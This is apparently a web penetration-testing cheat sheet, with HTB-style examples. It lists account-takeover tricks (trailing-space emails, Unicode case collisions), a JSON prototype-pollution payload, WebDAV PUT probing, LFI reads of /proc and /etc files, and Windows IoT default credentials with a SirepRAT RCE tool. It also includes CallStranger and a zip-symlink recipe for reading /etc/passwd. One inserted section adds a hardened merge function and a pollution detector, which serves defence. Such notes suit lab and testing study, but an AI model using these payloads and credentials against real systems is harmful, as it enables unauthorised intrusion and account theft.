webserver.md

Login exploits

1. While registering an account, try appending a space to the end of an already registered email to attempt account takeover (the DB strips the trailing space on insert, but the application does not).

2. If the email has a fixed maximum length and characters beyond it are stripped, try registering an email padded with spaces up to the maximum length followed by any character, e.g. <admin@htb.com      #>.

Unicode Collisions

Some Unicode characters collide with ASCII letters after case conversion. This can be used to exploit functionality such as a forgot-password flow that validates the address against the lowercased/uppercased value on file but sends the email to the address as entered.

```python
# https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/

# uppercase scenario
chr(0x017f).upper() == 'S'   # True: LATIN SMALL LETTER LONG S
chr(0x0131).upper() == 'I'   # True: LATIN SMALL LETTER DOTLESS I

# lowercase scenario
chr(0x212A).lower() == 'k'   # True: KELVIN SIGN
```

Javascript prototype pollution

With this bug we can add new properties to objects. For example, if the server takes JSON data and sets attributes from it, we can give the JSON object {"user":"test"} a new property admin=true.

Payload:

```json
{"user":"test","__proto__":{"admin":true}}
```

```javascript
let a = {};
let b = 1;
let c = 'ds';

// polluting the prototype
a.__proto__.foo = 'bar';

// every object now has a foo property with value bar
let d = new Object();
d.foo == 'bar';   // true
b.foo == 'bar';   // true (the primitive 1 is boxed and inherits from Object.prototype)
```
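As an added example (not from the original notes): a naive recursive merge of the kind that makes the payload above dangerous, next to a hardened merge that refuses prototype-chain keys, plus a small detector that reports where such keys occur in a request body. The function names are my own.

```javascript
// Constructed example: vulnerable vs. hardened recursive merge, exercised with
// the page's payload {"user":"test","__proto__":{"admin":true}}.
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Vulnerable: copies every key, including "__proto__". Because target.__proto__
// resolves to Object.prototype, the recursion writes admin=true onto it.
function unsafeMerge(target, src) {
  for (const key of Object.keys(src)) {
    if (isPlainObject(src[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], src[key]);
    } else {
      target[key] = src[key];
    }
  }
  return target;
}

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: skips the keys that reach the prototype chain and only recurses
// into properties the target itself owns, so nothing shared is ever written.
function safeMerge(target, src) {
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    if (isPlainObject(src[key])) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], src[key]);
    } else {
      target[key] = src[key];
    }
  }
  return target;
}

// Detection helper for request-body inspection: returns the dotted paths at
// which a forbidden key appears, e.g. ["__proto__"] for the page's payload.
function findPollutionKeys(obj, path = '') {
  const hits = [];
  for (const key of Object.keys(obj)) {
    const here = path ? `${path}.${key}` : key;
    if (FORBIDDEN_KEYS.has(key)) hits.push(here);
    if (isPlainObject(obj[key])) hits.push(...findPollutionKeys(obj[key], here));
  }
  return hits;
}
```

Note that JSON.parse creates "__proto__" as an own data property, which is exactly why a key-by-key merge reaches Object.prototype through the target rather than the source.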

WebDAV/PUT method enabled

```bash
curl -X PUT http://192.168.14.129/dav/test.txt   # check whether the PUT method is accepted
cadaver http://target/dav                        # interactive WebDAV client
```

LFI

```bash
cat /proc/version        # kernel version and build toolchain
cat /etc/issue           # distribution banner
cat /proc/self/environ   # environment of the process reading the file (web server user, paths)
cat /proc/net/tcp        # TCP sockets (listening and established), addresses/ports in hex
cat /proc/net/udp        # UDP sockets
```

Universal Plug and Play UPnP

  • Windows Device Portal - port 8080

    Windows IoT Core devices ship a dedicated web server called the Windows Device Portal. It runs on port 8080 in Development mode, with default credentials Administrator / p@ssw0rd (with a zero).

    RCE can be achieved through a vulnerability in the Sirep/WPCon communication protocol included with the Windows IoT operating system.

    ```bash
    # clone the SirepRAT repo
    git clone https://github.com/SafeBreach-Labs/SirepRAT
    ```

  • CallStranger (CVE-2020-12695) vulnerability - port 37215

    CallStranger is caused by the Callback header value of the UPnP SUBSCRIBE request being attacker-controllable, which enables an SSRF-like vulnerability.

    ```bash
    # clone the CallStranger repo
    git clone https://github.com/yunuscadirci/CallStranger
    ```

Zip Symlink

If zip files can be uploaded and their extracted content is accessible, try to read local files through a symlink stored in the archive.

```bash
mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt                         # prints the content of /etc/passwd (symlink followed locally)
cd ..
zip --symlinks -r test.zip test/     # --symlinks stores the link itself instead of its target
unzip -l test.zip                    # list the archive contents
```